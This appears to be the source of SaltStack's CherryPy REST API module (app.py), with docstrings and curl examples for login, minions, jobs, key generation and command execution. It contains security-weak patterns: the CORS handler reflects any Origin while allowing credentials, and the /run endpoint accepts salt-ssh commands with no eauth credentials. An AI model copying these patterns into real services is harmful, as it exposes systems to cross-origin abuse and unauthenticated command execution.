super().__init__(self.message)
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends: - CherryPy Python module
- salt-api package
:optdepends: - ws4py Python module for websockets support.
:configuration: All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` function in Salt (note
the dependencies for this module).
.. code-block:: bash
salt-call tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request.
.. glossary::
lowstate
A dictionary containing various keys that instruct Salt which command
to run, where that command lives, any parameters for that command, any
authentication credentials, what returner to use, etc.
Salt uses the lowstate data format internally in many places to pass
command data between functions. Salt also uses lowstate for the
:ref:`LocalClient() <python-api>` Python API interface.
The following example (in JSON format) causes Salt to execute two commands::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
from __future__ import absolute_import
# Import Python libs
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
import cherrypy
from cherrypy.lib import cpstats
import yaml
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -si https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
-d arg
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&arg&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:module:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
self._cp_config['tools.salt_token.on'] = True
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
def POST(self, mid, keysize=None, force=None, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
.. versionadded:: 2014.7.0
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sS http://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS http://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
self._cp_config['tools.hypermedia_out.on'] = False
self._cp_config['tools.sessions.on'] = False
lowstate = [{
'client': 'wheel',
'fun': 'key.gen_accept',
'id_': mid,
}]
if keysize:
lowstate[0]['keysize'] = keysize
if force:
lowstate[0]['force'] = force
lowstate[0].update(kwargs)
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
perms = eauth.get(token['name'], eauth.get('*'))
if perms is None:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad, authentication
should be handled by the SSH layer itself. The use of the salt-ssh client does not
require a salt master to be running. Instead, only a roster file must be present
in the salt configuration directory.
All SSH client requests are synchronous.
** Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_salt_token(self, salt_token):
'''
Check if this is a valid salt master token
More on salt master token generation can
be found at
http://docs.saltstack.com/en/latest/topics/eauth/index.html#tokens
Returns
True if this token is a valid salt token
